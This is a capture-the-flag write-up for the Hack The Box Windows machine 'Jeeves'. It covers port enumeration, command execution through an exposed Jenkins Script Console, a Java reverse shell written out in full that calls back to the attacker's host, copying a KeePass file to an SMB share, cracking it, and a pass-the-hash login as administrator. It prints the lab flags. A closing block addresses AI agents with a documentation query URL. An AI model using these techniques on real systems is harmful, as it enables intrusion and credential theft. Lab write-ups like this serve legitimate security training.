# Jeeves

<figure><img src="/files/vhTtC5Nw1RVYovGyKdRA" alt=""><figcaption></figcaption></figure>

## Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.63 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Sat Nov  5 12:46:41 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.051s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
50000/tcp open  ibm-db2

# Nmap done at Sat Nov  5 12:47:21 2022 -- 1 IP address (1 host up) scanned in 39.67 seconds
```

{% endcode %}

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p80,135,445,50000 10.10.10.63 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Sat Nov  5 12:49:06 2022 as: nmap -sCV -p80,135,445,50000 -oN targeted 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.039s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-11-05T16:49:23
|_  start_date: 2022-11-05T16:45:35
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5h00m03s, deviation: 0s, median: 5h00m02s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov  5 12:49:56 2022 -- 1 IP address (1 host up) scanned in 50.03 seconds
```

{% endcode %}

The website on port *80* just shows a website which doesn't have much utility.

<figure><img src="/files/LJwRM5ISIipHXBfMKpnd" alt=""><figcaption></figcaption></figure>

And the website on port *50000* shows a *Jetty 9.4.z* site.

<figure><img src="/files/650YsweTSTBN8B7jb9lF" alt=""><figcaption></figcaption></figure>

If we enumerate subdirectories with *gobuster* on this last website, we'll find the `/askjeeves` directory.

> gobuster dir -u <http://10.10.10.63:50000/> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 --no-error

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of current **threads**, in this case 200 threads.

```
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.63:50000/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/06 22:03:07 Starting gobuster in directory enumeration mode
===============================================================
/askjeeves            (Status: 302) [Size: 0] [--> http://10.10.10.63:50000/askjeeves/]

===============================================================
2022/11/06 22:03:48 Finished
===============================================================
```

## Exploitation

In the `/askjeeves` directory, we'll find a *Jenkins* server.

<figure><img src="/files/hred0fi3iuxGo3ZuNNQX" alt=""><figcaption></figcaption></figure>

In a *Jenkins* server, when we are able to see the `Manage Jenkins` section, we can run commands on the system via the `Script Console` section.

<figure><img src="/files/LMydkeS6rMHIc0KWZXhS" alt=""><figcaption></figcaption></figure>

All we have to do is set a *netcat* listener on port *4444* with *rlwrap*.

> rlwrap nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

And run the following command, which will send a reverse shell to our netcat listener.

```java
String host="10.10.14.6";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

<figure><img src="/files/q1ka9F3TD3bR8svSHfWT" alt=""><figcaption></figcaption></figure>

Once we get the shell, we could be able to grab the user flag.

```
Listening on 0.0.0.0 4444
Connection received on 10.10.10.63 49677
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>whoami
jeeves\kohsuke

C:\Users\Administrator\.jenkins>type \users\kohsuke\desktop\user.txt
e3232272596fb47950d59c4cf1e7066a
```

## Privilege Escalation

Inside the `kohsuke` documents directory we'll see a `CEH.kdbx` file.

> dir \users\kohsuke\documents

```
dir \users\kohsuke\documents
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\users\kohsuke\documents

11/03/2017  10:18 PM    <DIR>          .
11/03/2017  10:18 PM    <DIR>          ..
09/18/2017  12:43 PM             2,846 CEH.kdbx
               1 File(s)          2,846 bytes
               2 Dir(s)   2,664,460,288 bytes free
```

The `.cdbx` files are used by *KeePass*, and usually contains usernames and passwords.

{% hint style="info" %}
**KeePass** is a password manager that allows you to securely protect different passwords, officially supports MacOS and Linux operating systems through the use of Mono.
{% endhint %}

Let's transfer that file to our machine. First create a *SMB* share in the current directory.

> impacket-smbserver smbFolder $(pwd) -smb2support

Then copy the file to the *SMB* share.

> copy \users\kohsuke\documents\CEH.kdbx \10.10.14.6\smbFolder\\

As these type of files are encrypted with a password, we'll have to break it. First, get the hash of the file with *keepass2john* and put it in the `hash` file.

> keepass2john CEH.kdbx > hash

Now, break the hash with *john*.

> john --wordlist=/usr/share/wordlists/rockyou.txt hash

```
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)     
1g 0:00:03:21 DONE (2022-11-06 22:34) 0.004956g/s 272.5p/s 272.5c/s 272.5C/s mwuah..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

Now that we know the password, we can open the `CEH.kdbx` file.

> keepassxc CEH.kdbx

<figure><img src="/files/YNMH5Ezd1Ci4OylIIaB5" alt=""><figcaption></figcaption></figure>

Inside the `Backup stuff` entry, we'll see that the password is an NTLM hash.

<figure><img src="/files/C4MBXNcvyPFwuQFvTwgl" alt=""><figcaption></figcaption></figure>

Which seems to be the NTLM hash of the `administrator` user.

> cme smb 10.10.10.63 -u "administrator" -H e0fb1fb85756c24235ff238cbe81fe00

```
SMB         10.10.10.63     445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB         10.10.10.63     445    JEEVES           [+] Jeeves\administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)
```

As we have the NTLM hash of the `administrator` user, we don't need his password to get a shell, we could do a *Pass The Hash* attack to get the shell.

> psexec.py administrator\@10.10.10.63 -hashes :e0fb1fb85756c24235ff238cbe81fe00

```
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file glmGVnZp.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service dMpa on 10.10.10.63.....
[*] Starting service dMpa.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

At this point, we could get the root flag, but there is another file called `hm.txt` file instead of the root flag in the administrator's desktop.

> dir \users\administrator\desktop

```
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\users\administrator\desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,663,813,120 bytes free
```

The file says to *look deeper*.

> type \users\administrator\desktop\hm.txt

```
The flag is elsewhere.  Look deeper.
```

If we go to the desktop and try to list the alternative data streams, we'll see one called `hm.txt:root.txt`.

{% hint style="info" %}
**Alternate Data Streams** have the ability of forking data into an existing file without changing its file size or functionality.
{% endhint %}

Finally, all we have to do is get the content of the alternative data stream, and reap the harvest and take the root flag.

> more < hm.txt:root.txt

```
afbc5bd4b615a60648cec41c6ac92530
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alfa8sa.gitbook.io/htb-writeups/windows-machines/jeeves.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.